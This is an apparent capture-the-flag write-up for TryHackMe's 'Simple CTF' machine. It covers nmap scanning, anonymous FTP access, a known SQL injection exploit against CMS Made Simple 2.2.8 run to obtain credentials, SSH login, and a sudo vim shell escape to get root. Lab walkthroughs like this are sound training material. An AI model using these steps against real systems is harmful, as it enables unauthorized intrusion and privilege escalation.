TryHackMe Simple CTF-Writeup

Simple CTF is a beginner level machine on TryHackMe. The machine has a webserver, a FTP server and a ssh service running. The webserver has an installation of CMS Made Simple 2.2.8 which is vulnerable to SQLi . This SQLi is used to gain credentials of the ssh user and the sudo privileges are misconfigured which is used to gain root access on the machine

Simple CTF-Writeup

Connecting to HTB Vpn:

1] First download the VPN file from the access page of tryhackme

2] Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3] Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4] You can access the machine at the given ip



1] First let’s do a nmap scan on our target at

nmap -sV -A -p-

-sV : to get the service versions on each port
-A : to get information such as os details,traceroutes,ports etc
-p- : to scan all 65535 ports

We get the following details from our scan

Simple CTF-Writeup


2] Ftp anonymous login is enabled,so let’s log in


Simple CTF-Writeup

3] There is a text files and downloading that gives us the following output

get ForMitch.txt


4] Now lets do a directory scan on the web server


5] There is directory called simple

Simple CTF-Writeup

6] Upon visiting the directory at , we got to know that the web server is running CMS Made Simple 2.2.8



7] Lets use searchsploit to find exploits for this service

searchsploit cms made simple 2.2.8



8] There is an Sqli exploit ,so let’s download it to our system

searchsploit -m 46635

9] Now lets run the exploit

python -u –crack -w




10] After running the exploit, we got a username and password. Since there is an ssh port on 2222, lets try these credentials over there

ssh [email protected] -p 2222



11] Lets list what all sudo privileges we have

sudo -l

12] It looks like we can run vim as the root user. So lets use GTFOBins to exploit this

13] After enter the below command we get the shell as the root user

sudo vim -c ‘:!/bin/sh’


Don’t forget to check out our latest Blogs  – TryHackMe Sudo Buffer Overflow-Writeup

Leave a Reply

Your email address will not be published. Required fields are marked *